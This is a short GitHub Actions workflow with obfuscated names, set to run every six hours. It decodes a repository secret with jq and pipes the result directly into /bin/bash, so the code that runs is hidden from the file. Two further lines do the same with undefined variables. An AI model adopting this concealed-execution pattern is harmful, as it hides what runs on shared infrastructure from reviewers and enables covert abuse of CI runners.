name: maoziran6798

on:
  workflow_dispatch:
  schedule:
    - cron: '29 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: maoziran6798
        env:
          gskm4609: ${{ secrets.gskm4609 }}
        run: |
          echo $gskm4609 | jq -r .x7 | /bin/bash
          echo $yfd4 | jq -r .vu5 | /bin/bash
          echo $fg64 | jq -r .suwo0 | /bin/bash

